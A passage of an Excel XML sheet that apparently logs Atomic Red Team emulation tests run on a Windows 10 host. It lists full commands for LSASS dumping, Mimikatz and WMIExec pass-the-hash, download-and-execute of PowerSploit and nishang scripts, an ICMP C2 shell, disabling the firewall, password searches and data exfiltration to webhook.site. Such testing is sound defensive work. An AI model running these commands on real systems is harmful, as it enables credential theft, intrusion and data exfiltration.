            <v>rockus</v>
          </cell>
          <cell r="E75" t="str">
            <v>win10</v>
          </cell>
          <cell r="F75">
            <v>5620</v>
          </cell>
          <cell r="G75" t="str">
            <v>certutil -encode C:\Windows\System32\calc.exe %temp%\T1140_calc.txt &amp;&amp; certutil -decode %temp%\T1140_calc.txt %temp%\T1140_calc_decoded.exe</v>
          </cell>
        </row>
        <row r="76">
          <cell r="A76" t="str">
            <v>Invoke-WMIExec Pass the Hash</v>
          </cell>
          <cell r="B76" t="str">
            <v>2022-11-30T18:46:42Z</v>
          </cell>
          <cell r="C76" t="str">
            <v>Invoke-WMIExec Pass the Hash</v>
          </cell>
          <cell r="D76" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E76" t="str">
            <v>win10</v>
          </cell>
          <cell r="F76">
            <v>6680</v>
          </cell>
          <cell r="G76" t="str">
            <v>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target $env:COMPUTERNAME -Username Administrador -Hash cc36cf7a8514893efccd3324464tkg1a -Command hostname</v>
          </cell>
        </row>
        <row r="77">
          <cell r="A77" t="str">
            <v>Disable Microsoft Defender Firewall</v>
          </cell>
          <cell r="B77" t="str">
            <v>2022-11-30T18:47:38Z</v>
          </cell>
          <cell r="C77" t="str">
            <v>Disable Microsoft Defender Firewall</v>
          </cell>
          <cell r="D77" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E77" t="str">
            <v>win10</v>
          </cell>
          <cell r="F77">
            <v>6512</v>
          </cell>
          <cell r="G77" t="str">
            <v>netsh advfirewall set currentprofile state off</v>
          </cell>
        </row>
        <row r="78">
          <cell r="A78" t="str">
            <v>Hidden Window</v>
          </cell>
          <cell r="B78" t="str">
            <v>2022-11-30T18:48:23Z</v>
          </cell>
          <cell r="C78" t="str">
            <v>Hidden Window</v>
          </cell>
          <cell r="D78" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E78" t="str">
            <v>win10</v>
          </cell>
          <cell r="F78">
            <v>3720</v>
          </cell>
          <cell r="G78" t="str">
            <v>Start-Process powershell.exe -WindowStyle hidden calc.exe</v>
          </cell>
        </row>
        <row r="79">
          <cell r="A79" t="str">
            <v>Service ImagePath Change with reg.exe</v>
          </cell>
          <cell r="B79" t="str">
            <v>2022-11-30T18:49:23Z</v>
          </cell>
          <cell r="C79" t="str">
            <v>Service ImagePath Change with reg.exe</v>
          </cell>
          <cell r="D79" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E79" t="str">
            <v>win10</v>
          </cell>
          <cell r="F79">
            <v>2804</v>
          </cell>
          <cell r="G79" t="str">
            <v>reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\calcservice" /f /v ImagePath /d "%windir%\system32\cmd.exe" &amp;&amp; sc.exe create calcservice binpath= "%windir%\system32\win32calc.exe"</v>
          </cell>
        </row>
        <row r="80">
          <cell r="A80" t="str">
            <v>Dump LSASS.exe Memory using Out-Minidump.ps1</v>
          </cell>
          <cell r="B80" t="str">
            <v>2022-11-30T18:49:58Z</v>
          </cell>
          <cell r="C80" t="str">
            <v>Dump LSASS.exe Memory using Out-Minidump.ps1</v>
          </cell>
          <cell r="D80" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E80" t="str">
            <v>win10</v>
          </cell>
          <cell r="F80">
            <v>7616</v>
          </cell>
          <cell r="G80" t="str">
            <v>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump</v>
          </cell>
        </row>
        <row r="81">
          <cell r="A81" t="str">
            <v>Dump LSASS.exe Memory using ProcDump</v>
          </cell>
          <cell r="B81" t="str">
            <v>2022-11-30T18:51:03Z</v>
          </cell>
          <cell r="C81" t="str">
            <v>Dump LSASS.exe Memory using ProcDump</v>
          </cell>
          <cell r="D81" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E81" t="str">
            <v>win10</v>
          </cell>
          <cell r="F81">
            <v>7816</v>
          </cell>
          <cell r="G81" t="str">
            <v>[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip";Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force;New-Item -ItemType Directory (Split-Path PathToAtomicsFolder\T1003.001\bin\procdump.exe) -Force | Out-Null;Copy-Item $env:TEMP\Procdump\Procdump.exe PathToAtomicsFolder\T1003.001\bin\procdump.exe -Force;PathToAtomicsFolder\T1003.001\bin\procdump.exe -accepteula -ma lsass.exe C:\Windows\Temp\lsass_dump.dmp</v>
          </cell>
        </row>
        <row r="82">
          <cell r="A82" t="str">
            <v>Sniff network traffic</v>
          </cell>
          <cell r="B82" t="str">
            <v>2022-11-30T18:51:33Z</v>
          </cell>
          <cell r="C82" t="str">
            <v>Sniff network traffic</v>
          </cell>
          <cell r="D82" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E82" t="str">
            <v>win10</v>
          </cell>
          <cell r="F82">
            <v>2452</v>
          </cell>
          <cell r="G82" t="str">
            <v>$path = "$ENV:UserProfile\Desktop\pcap.etl";New-NetEventSession -Name "PCAP" -CaptureMode SaveToFile -LocalFilePath $path;Add-NetEventProvider -Name "Microsoft-Windows-TCPIP" -SessionName "PCAP";Start-NetEventSession -Name "PCAP";Start-Sleep -s 60;Stop-NetEventSession -Name "PCAP";if (Test-Path $path) {  echo $path;  exit 0;} else {  echo "Failed to generate PCAP file.";  exit 1;};</v>
          </cell>
        </row>
        <row r="83">
          <cell r="A83" t="str">
            <v>Extracting passwords with findstr</v>
          </cell>
          <cell r="B83" t="str">
            <v>2022-11-30T18:53:13Z</v>
          </cell>
          <cell r="C83" t="str">
            <v>Extracting passwords with findstr</v>
          </cell>
          <cell r="D83" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E83" t="str">
            <v>win10</v>
          </cell>
          <cell r="F83">
            <v>3044</v>
          </cell>
          <cell r="G83" t="str">
            <v>findstr /si pass *.xml *.doc *.txt *.xls; ls -R | select-string -ErrorAction SilentlyContinue -Pattern password</v>
          </cell>
        </row>
        <row r="84">
          <cell r="A84" t="str">
            <v>Find private keys</v>
          </cell>
          <cell r="B84" t="str">
            <v>2022-11-30T18:54:34Z</v>
          </cell>
          <cell r="C84" t="str">
            <v>Find private keys</v>
          </cell>
          <cell r="D84" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E84" t="str">
            <v>win10</v>
          </cell>
          <cell r="F84">
            <v>992</v>
          </cell>
          <cell r="G84" t="str">
            <v>foreach($i in @(".key"</v>
          </cell>
        </row>
        <row r="85">
          <cell r="A85" t="str">
            <v>Windows Internal Packet Capture</v>
          </cell>
          <cell r="B85" t="str">
            <v>2022-11-30T18:56:04Z</v>
          </cell>
          <cell r="C85" t="str">
            <v>Windows Internal Packet Capture</v>
          </cell>
          <cell r="D85" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E85" t="str">
            <v>win10</v>
          </cell>
          <cell r="F85">
            <v>2324</v>
          </cell>
          <cell r="G85" t="str">
            <v>netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10</v>
          </cell>
        </row>
        <row r="86">
          <cell r="A86" t="str">
            <v>Map admin share</v>
          </cell>
          <cell r="B86" t="str">
            <v>2022-11-30T18:56:24Z</v>
          </cell>
          <cell r="C86" t="str">
            <v>Map admin share</v>
          </cell>
          <cell r="D86" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E86" t="str">
            <v>win10</v>
          </cell>
          <cell r="F86">
            <v>5032</v>
          </cell>
          <cell r="G86" t="str">
            <v>cmd.exe /c "net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator"</v>
          </cell>
        </row>
        <row r="87">
          <cell r="A87" t="str">
            <v>Execute command writing output to local Admin Share</v>
          </cell>
          <cell r="B87" t="str">
            <v>2022-11-30T18:57:24Z</v>
          </cell>
          <cell r="C87" t="str">
            <v>Execute command writing output to local Admin Share</v>
          </cell>
          <cell r="D87" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E87" t="str">
            <v>win10</v>
          </cell>
          <cell r="F87">
            <v>6228</v>
          </cell>
          <cell r="G87" t="str">
            <v>cmd.exe /Q /c hostname 1&gt; \\127.0.0.1\ADMIN$\output.txt 2&gt;&amp;1</v>
          </cell>
        </row>
        <row r="88">
          <cell r="A88" t="str">
            <v>Mimikatz Pass the Hash</v>
          </cell>
          <cell r="B88" t="str">
            <v>2022-11-30T18:57:59Z</v>
          </cell>
          <cell r="C88" t="str">
            <v>Mimikatz Pass the Hash</v>
          </cell>
          <cell r="D88" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E88" t="str">
            <v>win10</v>
          </cell>
          <cell r="F88">
            <v>7560</v>
          </cell>
          <cell r="G88" t="str">
            <v>####%tmp%\mimikatz\x64\mimikatz.exe "sekurlsa::pth /user:Administrator /domain:%userdnsdomain% /ntlm:cc36cf7a8514893efccd3324464tkg1a"</v>
          </cell>
        </row>
        <row r="89">
          <cell r="A89" t="str">
            <v>Copy a sensitive File over Administive share with Powershell</v>
          </cell>
          <cell r="B89" t="str">
            <v>2022-11-30T18:58:50Z</v>
          </cell>
          <cell r="C89" t="str">
            <v>Copy a sensitive File over Administive share with Powershell</v>
          </cell>
          <cell r="D89" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E89" t="str">
            <v>win10</v>
          </cell>
          <cell r="F89">
            <v>7948</v>
          </cell>
          <cell r="G89" t="str">
            <v>Write-Host 'Please Enable "C$" share on 127.0.0.1';Out-File -FilePath "\\127.0.0.1\C$\Windows\temp\Easter_Bunny.password";copy-item -Path "\\127.0.0.1\C$\Windows\temp\Easter_Bunny.password" -Destination "$Env:TEMP\Easter_egg.password"</v>
          </cell>
        </row>
        <row r="90">
          <cell r="A90" t="str">
            <v>Copy a sensitive File over Administive share with copy</v>
          </cell>
          <cell r="B90" t="str">
            <v>2022-11-30T18:59:35Z</v>
          </cell>
          <cell r="C90" t="str">
            <v>Copy a sensitive File over Administive share with copy</v>
          </cell>
          <cell r="D90" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E90" t="str">
            <v>win10</v>
          </cell>
          <cell r="F90">
            <v>7792</v>
          </cell>
          <cell r="G90" t="str">
            <v>copy \\127.0.0.1\C$\Windows\temp\Easter_Bunny.password %TEMP%\Easter_egg.password</v>
          </cell>
        </row>
        <row r="91">
          <cell r="A91" t="str">
            <v>Create staging directory</v>
          </cell>
          <cell r="B91" t="str">
            <v>2022-11-30T19:00:10Z</v>
          </cell>
          <cell r="C91" t="str">
            <v>Create staging directory</v>
          </cell>
          <cell r="D91" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E91" t="str">
            <v>win10</v>
          </cell>
          <cell r="F91">
            <v>7600</v>
          </cell>
          <cell r="G91" t="str">
            <v>New-Item -Path "." -Name "staged" -ItemType "directory" -Force | foreach {$_.FullName} | Select-Object</v>
          </cell>
        </row>
        <row r="92">
          <cell r="A92" t="str">
            <v>Stage data from Discovery.bat</v>
          </cell>
          <cell r="B92" t="str">
            <v>2022-11-30T19:00:50Z</v>
          </cell>
          <cell r="C92" t="str">
            <v>Stage data from Discovery.bat</v>
          </cell>
          <cell r="D92" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E92" t="str">
            <v>win10</v>
          </cell>
          <cell r="F92">
            <v>8148</v>
          </cell>
          <cell r="G92" t="str">
            <v>Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile $env:TEMP\discovery.bat</v>
          </cell>
        </row>
        <row r="93">
          <cell r="A93" t="str">
            <v>Compress Data and lock with password for Exfiltration with winrar</v>
          </cell>
          <cell r="B93" t="str">
            <v>2022-11-30T19:01:35Z</v>
          </cell>
          <cell r="C93" t="str">
            <v>Compress Data and lock with password for Exfiltration with winrar</v>
          </cell>
          <cell r="D93" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E93" t="str">
            <v>win10</v>
          </cell>
          <cell r="F93">
            <v>4184</v>
          </cell>
          <cell r="G93" t="str">
            <v>if not exist "%programfiles%/WinRAR/Rar.exe"  ( call ) ELSE ( echo Downloading Winrar installer &amp;&amp; bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" %TEMP%\winrar.exe &amp;&amp; %TEMP%\winrar.exe /S ) &amp;&amp; mkdir .\tmp\victim-files &amp;&amp; cd .\tmp\victim-files &amp;&amp; echo "This file will be encrypted" &gt; .\encrypted_file.txt &amp;&amp; "%programfiles%/WinRAR/Rar.exe" a -hp "blue" hello.rar &amp;&amp; dir</v>
          </cell>
        </row>
        <row r="94">
          <cell r="A94" t="str">
            <v>Compress staged directory</v>
          </cell>
          <cell r="B94" t="str">
            <v>2022-11-30T19:02:55Z</v>
          </cell>
          <cell r="C94" t="str">
            <v>Compress staged directory</v>
          </cell>
          <cell r="D94" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E94" t="str">
            <v>win10</v>
          </cell>
          <cell r="F94">
            <v>7528</v>
          </cell>
          <cell r="G94" t="str">
            <v>Compress-Archive -Path C:\Users\Public\staged -DestinationPath C:\Users\Public\staged.zip -Force;sleep 1; ls C:\Users\Public\staged.zip | foreach {$_.FullName} | select</v>
          </cell>
        </row>
        <row r="95">
          <cell r="A95" t="str">
            <v>Tor Proxy Usage - Windows</v>
          </cell>
          <cell r="B95" t="str">
            <v>2022-11-30T19:03:05Z</v>
          </cell>
          <cell r="C95" t="str">
            <v>Tor Proxy Usage - Windows</v>
          </cell>
          <cell r="D95" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E95" t="str">
            <v>win10</v>
          </cell>
          <cell r="F95">
            <v>3588</v>
          </cell>
          <cell r="G95" t="str">
            <v>invoke-expression 'cmd /c start powershell -Command {cmd /c $env:temp\tor\Tor\tor.exe}'; sleep -s 60; stop-process -name "tor" | out-null</v>
          </cell>
        </row>
        <row r="96">
          <cell r="A96" t="str">
            <v>Psiphon</v>
          </cell>
          <cell r="B96" t="str">
            <v>2022-11-30T19:05:01Z</v>
          </cell>
          <cell r="C96" t="str">
            <v>Psiphon</v>
          </cell>
          <cell r="D96" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E96" t="str">
            <v>win10</v>
          </cell>
          <cell r="F96">
            <v>984</v>
          </cell>
          <cell r="G96" t="str">
            <v>cfb85f_Psiphon.bat</v>
          </cell>
        </row>
        <row r="97">
          <cell r="A97" t="str">
            <v>Malicious User Agents - CMD</v>
          </cell>
          <cell r="B97" t="str">
            <v>2022-11-30T19:05:36Z</v>
          </cell>
          <cell r="C97" t="str">
            <v>Malicious User Agents - CMD</v>
          </cell>
          <cell r="D97" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E97" t="str">
            <v>win10</v>
          </cell>
          <cell r="F97">
            <v>3400</v>
          </cell>
          <cell r="G97" t="str">
            <v>C:\Windows\System32\Curl.exe -s -A "HttpBrowser/1.0" -m3 www.google.com &gt;nul 2&gt;&amp;1 &amp;&amp; C:\Windows\System32\Curl.exe -s -A "Wget/1.9+cvs-stable (Red Hat modified)" -m3 www.google.com &gt;nul 2&gt;&amp;1 &amp;&amp; C:\Windows\System32\Curl.exe -s -A "Opera/8.81 (Windows NT 6.0; U; en)" -m3 www.google.com &gt;nul 2&gt;&amp;1 &amp;&amp; C:\Windows\System32\Curl.exe -s -A "*&lt;|&gt;*" -m3 www.google.com &gt;nul 2&gt;&amp;1</v>
          </cell>
        </row>
        <row r="98">
          <cell r="A98" t="str">
            <v>Malicious User Agents - Powershell</v>
          </cell>
          <cell r="B98" t="str">
            <v>2022-11-30T19:06:21Z</v>
          </cell>
          <cell r="C98" t="str">
            <v>Malicious User Agents - Powershell</v>
          </cell>
          <cell r="D98" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E98" t="str">
            <v>win10</v>
          </cell>
          <cell r="F98">
            <v>2372</v>
          </cell>
          <cell r="G98" t="str">
            <v>Invoke-WebRequest www.google.com -UserAgent "HttpBrowser/1.0" | out-null; Invoke-WebRequest www.google.com -UserAgent "Wget/1.9+cvs-stable (Red Hat modified)" | out-null; Invoke-WebRequest www.google.com -UserAgent "Opera/8.81 (Windows NT 6.0; U; en)" | out-null; Invoke-WebRequest www.google.com -UserAgent "*&lt;|&gt;*" | out-null</v>
          </cell>
        </row>
        <row r="99">
          <cell r="A99" t="str">
            <v>DNS Long Domain Query</v>
          </cell>
          <cell r="B99" t="str">
            <v>2022-11-30T19:07:26Z</v>
          </cell>
          <cell r="C99" t="str">
            <v>DNS Long Domain Query</v>
          </cell>
          <cell r="D99" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E99" t="str">
            <v>win10</v>
          </cell>
          <cell r="F99">
            <v>5544</v>
          </cell>
          <cell r="G99" t="str">
            <v>New-Item -Type Directory (split-path PathToAtomicsFolder\T1071.004\src\T1071-dns-domain-length.ps1) -ErrorAction ignore | Out-Null;Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1071.004/src/T1071-dns-domain-length.ps1" -OutFile "PathToAtomicsFolder\T1071.004\src\T1071-dns-domain-length.ps1";Set-Location PathToAtomicsFolder; .\T1071.004\src\T1071-dns-domain-length.ps1 -Domain 127.0.0.1.xip.io -Subdomain atomicredteamatomicredteamatomicredteamatomicredteamatomicredte -QueryType TXT</v>
          </cell>
        </row>
        <row r="100">
          <cell r="A100" t="str">
            <v>ICMP C2</v>
          </cell>
          <cell r="B100" t="str">
            <v>2022-11-30T19:08:16Z</v>
          </cell>
          <cell r="C100" t="str">
            <v>ICMP C2</v>
          </cell>
          <cell r="D100" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E100" t="str">
            <v>win10</v>
          </cell>
          <cell r="F100">
            <v>948</v>
          </cell>
          <cell r="G100" t="str">
            <v>IEX (New-Object System.Net.WebClient).Downloadstring('https://raw.githubusercontent.com/samratashok/nishang/c75da7f91fcc356f846e09eab0cfd7f296ebf746/Shells/Invoke-PowerShellIcmp.ps1'); Invoke-PowerShellIcmp -IPAddress 127.0.0.1</v>
          </cell>
        </row>
        <row r="101">
          <cell r="A101" t="str">
            <v>Install PSTools</v>
          </cell>
          <cell r="B101" t="str">
            <v>2022-11-30T19:10:16Z</v>
          </cell>
          <cell r="C101" t="str">
            <v>Install PSTools</v>
          </cell>
          <cell r="D101" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E101" t="str">
            <v>win10</v>
          </cell>
          <cell r="F101">
            <v>8132</v>
          </cell>
          <cell r="G101" t="str">
            <v>[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadFile("https://download.sysinternals.com/files/PSTools.zip"</v>
          </cell>
        </row>
        <row r="102">
          <cell r="A102" t="str">
            <v>File Download via PowerShell</v>
          </cell>
          <cell r="B102" t="str">
            <v>2022-11-30T19:10:31Z</v>
          </cell>
          <cell r="C102" t="str">
            <v>File Download via PowerShell</v>
          </cell>
          <cell r="D102" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E102" t="str">
            <v>win10</v>
          </cell>
          <cell r="F102">
            <v>6408</v>
          </cell>
          <cell r="G102" t="str">
            <v>(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/4042cb3433bce024e304500dcfe3c5590571573a/LICENSE.txt') | Out-File LICENSE.txt; Invoke-Item LICENSE.txt</v>
          </cell>
        </row>
        <row r="103">
          <cell r="A103" t="str">
            <v>Curl Download File</v>
          </cell>
          <cell r="B103" t="str">
            <v>2022-11-30T19:11:22Z</v>
          </cell>
          <cell r="C103" t="str">
            <v>Curl Download File</v>
          </cell>
          <cell r="D103" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E103" t="str">
            <v>win10</v>
          </cell>
          <cell r="F103">
            <v>5512</v>
          </cell>
          <cell r="G103" t="str">
            <v>C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\users\public\music\allthethingsx64.dll &amp;&amp; C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll --output c:\users\public\music\allthethingsx64.dll &amp;&amp; C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o c:\programdata\allthethingsx64.dll &amp;&amp; C:\Windows\System32\Curl.exe -k https://github.com/redcanaryco/atomic-red-team/raw/058b5c2423c4a6e9e226f4e5ffa1a6fd9bb1a90e/atomics/T1218.010/bin/AllTheThingsx64.dll -o %Temp%\allthethingsx64.dll</v>
          </cell>
        </row>
        <row r="104">
          <cell r="A104" t="str">
            <v>XOR Encoded data.</v>
          </cell>
          <cell r="B104" t="str">
            <v>2022-11-30T19:12:02Z</v>
          </cell>
          <cell r="C104" t="str">
            <v>XOR Encoded data.</v>
          </cell>
          <cell r="D104" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E104" t="str">
            <v>win10</v>
          </cell>
          <cell r="F104">
            <v>4604</v>
          </cell>
          <cell r="G104" t="str">
            <v>$plaintext = ([system.Text.Encoding]::UTF8.getBytes("Path\n----\nC:\Users\victim")); $key = "abcdefghijklmnopqrstuvwxyz123456"; $cyphertext =  @(); for ($i = 0; $i -lt $plaintext.Count; $i++) {;  $cyphertext += $plaintext[$i] -bxor $key[$i % $key.Length]; }; $cyphertext = [system.Text.Encoding]::UTF8.getString($cyphertext); [System.Net.ServicePointManager]::Expect100Continue = $false; Invoke-WebRequest -Uri example.com -Method POST -Body $cyphertext -DisableKeepAlive</v>
          </cell>
        </row>
        <row r="105">
          <cell r="A105" t="str">
            <v>DNS over HTTPS Large Query Volume</v>
          </cell>
          <cell r="B105" t="str">
            <v>2022-11-30T19:12:37Z</v>
          </cell>
          <cell r="C105" t="str">
            <v>DNS over HTTPS Large Query Volume</v>
          </cell>
          <cell r="D105" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E105" t="str">
            <v>win10</v>
          </cell>
          <cell r="F105">
            <v>1384</v>
          </cell>
          <cell r="G105" t="str">
            <v>for($i=0; $i -le 1000; $i++) { (Invoke-WebRequest "https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&amp;type=TXT" -UseBasicParsing).Content}</v>
          </cell>
        </row>
        <row r="106">
          <cell r="A106" t="str">
            <v>Data Exfiltration with ConfigSecurityPolicy</v>
          </cell>
          <cell r="B106" t="str">
            <v>2022-11-30T19:15:07Z</v>
          </cell>
          <cell r="C106" t="str">
            <v>Data Exfiltration with ConfigSecurityPolicy</v>
          </cell>
          <cell r="D106" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E106" t="str">
            <v>win10</v>
          </cell>
          <cell r="F106">
            <v>7576</v>
          </cell>
          <cell r="G106" t="str">
            <v>$path = resolve-path "c:\ProgramData\Microsoft\Windows Defender\Platform\*\ConfigSecurityPolicy.exe";  $path[0] c:\temp\config.xml "https://webhook.site?d=sensitive-data-here"</v>
          </cell>
        </row>
        <row r="107">
          <cell r="A107" t="str">
            <v>Windows - Stop service using net.exe</v>
          </cell>
          <cell r="B107" t="str">
            <v>2022-11-30T19:15:27Z</v>
          </cell>
          <cell r="C107" t="str">
            <v>Windows - Stop service using net.exe</v>
          </cell>
          <cell r="D107" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E107" t="str">
            <v>win10</v>
          </cell>
          <cell r="F107">
            <v>112</v>
          </cell>
          <cell r="G107" t="str">
            <v>net.exe stop spooler</v>
          </cell>
        </row>
        <row r="108">
          <cell r="A108" t="str">
            <v>Windows - Stop service using Service Controller</v>
          </cell>
          <cell r="B108" t="str">
            <v>2022-11-30T19:16:12Z</v>
          </cell>
          <cell r="C108" t="str">
            <v>Windows - Stop service using Service Controller</v>
          </cell>
          <cell r="D108" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E108" t="str">
            <v>win10</v>
          </cell>
          <cell r="F108">
            <v>7888</v>
          </cell>
          <cell r="G108" t="str">
            <v>sc.exe stop spooler</v>
          </cell>
        </row>
        <row r="109">
          <cell r="A109" t="str">
            <v>Running Chrome VPN Extensions via the Registry 2 vpn extension</v>
          </cell>
          <cell r="B109" t="str">
            <v>2022-11-30T19:17:12Z</v>
          </cell>
          <cell r="C109" t="str">
            <v>Running Chrome VPN Extensions via the Registry 2 vpn extension</v>
          </cell>
          <cell r="D109" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E109" t="str">
            <v>win10</v>
          </cell>
          <cell r="F109">
            <v>6976</v>
          </cell>
          <cell r="G109" t="str">
            <v>$extList = "fcfhplploccackoneaefokcmbjfbkenj"</v>
          </cell>
        </row>
        <row r="110">
          <cell r="A110" t="str">
            <v>USB Malware Spread Simulation</v>
          </cell>
          <cell r="B110" t="str">
            <v>2022-11-30T19:18:43Z</v>
          </cell>
          <cell r="C110" t="str">
            <v>USB Malware Spread Simulation</v>
          </cell>
          <cell r="D110" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E110" t="str">
            <v>win10</v>
          </cell>
          <cell r="F110">
            <v>692</v>
          </cell>
          <cell r="G110" t="str">
            <v>$RemovableDrives=@(); $RemovableDrives = Get-WmiObject -Class Win32_LogicalDisk -filter "drivetype=2" | select-object -expandproperty DeviceID; ForEach ($Drive in $RemovableDrives) { write-host "Removable Drive Found:" $Drive; New-Item -Path $Drive/T1091Test1.txt -ItemType "file" -Force -Value "T1091 Test 1 has created this file to simulate malware spread to removable drives." }</v>
          </cell>
        </row>
        <row r="111">
          <cell r="A111" t="str">
            <v>Create local account with admin privileges</v>
          </cell>
          <cell r="B111" t="str">
            <v>2022-11-30T19:19:08Z</v>
          </cell>
          <cell r="C111" t="str">
            <v>Create local account with admin privileges</v>
          </cell>
          <cell r="D111" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E111" t="str">
            <v>win10</v>
          </cell>
          <cell r="F111">
            <v>5512</v>
          </cell>
          <cell r="G111" t="str">
            <v>net user art-test /add &amp;&amp; net user art-test C0ntr4seNNa &amp;&amp; net localgroup administrators art-test /add</v>
          </cell>
        </row>
        <row r="112">
          <cell r="A112" t="str">
            <v>PowerShell Command Execution</v>
          </cell>
          <cell r="B112" t="str">
            <v>2022-11-30T19:20:03Z</v>
          </cell>
          <cell r="C112" t="str">
            <v>PowerShell Command Execution</v>
          </cell>
          <cell r="D112" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E112" t="str">
            <v>win10</v>
          </cell>
          <cell r="F112">
            <v>3736</v>
          </cell>
          <cell r="G112" t="str">
            <v>powershell.exe -e  JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==</v>
          </cell>
        </row>
        <row r="113">
          <cell r="A113" t="str">
            <v>Admin Account Manipulate</v>
          </cell>
          <cell r="B113" t="str">
            <v>2022-11-30T19:21:08Z</v>
          </cell>
          <cell r="C113" t="str">
            <v>Admin Account Manipulate</v>
          </cell>
          <cell r="D113" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E113" t="str">
            <v>win10</v>
          </cell>
          <cell r="F113">
            <v>4564</v>
          </cell>
          <cell r="G113" t="str">
            <v>$x = Get-Random -Minimum 2 -Maximum 9999; $y = Get-Random -Minimum 2 -Maximum 9999; $z = Get-Random -Minimum 2 -Maximum 9999; $w = Get-Random -Minimum 2 -Maximum 9999; Write-Host HaHa_$x$y$z; $fmm = Get-LocalGroupMember -Group Administrators |?{ $_.ObjectClass -match "User" -and $_.PrincipalSource -match "Local"} | Select Name; foreach($member in $fmm) {;     if($member -like "*Administrator*") {;         $account = $member.Name -replace ".+\\\"</v>
          </cell>
        </row>
        <row r="114">
          <cell r="A114" t="str">
            <v>UACME Bypass Method 33</v>
          </cell>
          <cell r="B114" t="str">
            <v>2022-11-30T19:21:48Z</v>
          </cell>
          <cell r="C114" t="str">
            <v>UACME Bypass Method 33</v>
          </cell>
          <cell r="D114" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E114" t="str">
            <v>win10</v>
          </cell>
          <cell r="F114">
            <v>6124</v>
          </cell>
          <cell r="G114" t="str">
            <v>%temp%\uacme\33 Akagi64.exe</v>
          </cell>
        </row>
        <row r="115">
          <cell r="A115" t="str">
            <v>LockBit Black - Modify Group policy settings -cmd</v>
          </cell>
          <cell r="B115" t="str">
            <v>2022-11-30T19:22:33Z</v>
          </cell>
          <cell r="C115" t="str">
            <v>LockBit Black - Modify Group policy settings -cmd</v>
          </cell>
          <cell r="D115" t="str">
            <v>rockus</v>
          </cell>
          <cell r="E115" t="str">
            <v>win10</v>
          </cell>
          <cell r="F115">
            <v>7708</v>
          </cell>
